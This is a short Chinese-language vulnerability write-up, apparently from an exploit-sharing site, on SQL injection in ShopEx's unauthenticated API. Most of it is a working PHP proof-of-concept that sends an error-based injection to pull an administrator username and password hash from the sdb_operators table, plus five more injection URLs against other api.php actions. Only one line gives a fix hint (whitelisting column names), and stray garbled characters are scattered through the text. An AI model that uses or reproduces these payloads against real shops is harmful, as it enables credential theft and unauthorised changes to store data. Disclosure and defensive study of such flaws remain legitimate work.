缺陷文件:\core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
缺陷文件:core\api\payment\1.0\api_b2b_2_0_payment_cfg.php
第44行 $data['columns'] 未做过滤导致注入（列名无法通过参数绑定传入，应以表字段白名单校验 columns 的取值）
/ j- r5 x4 K& p# [8 k<?php set_time_limit(0); ob_flush(); echo 'Test: http://localhost:808'."\r\n"; $sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1'; $url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0'; $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POSTFIELDS, $sql); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); flush(); $data = curl_exec($ch); echo $data; curl_close($ch); ?>外带一句 ShopEx对API操作的模块未做认证,任何用户都可访问,攻击者可通过它来对产品的分类,类型,规格,品牌等,进行添加,删除和修改,过滤不当还可造成注入.* M4 n# x1 e* n% Q
注射1:
% ]; T0 \. v5 ehttp://www.0day5.com/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#
注射2:
http://www.0day5.com/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}
注射3:
http://www.0day5.com/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx
注射4:
http://www.0day5.com/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1&currency=1
注射5:
http://www.0day5.com/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx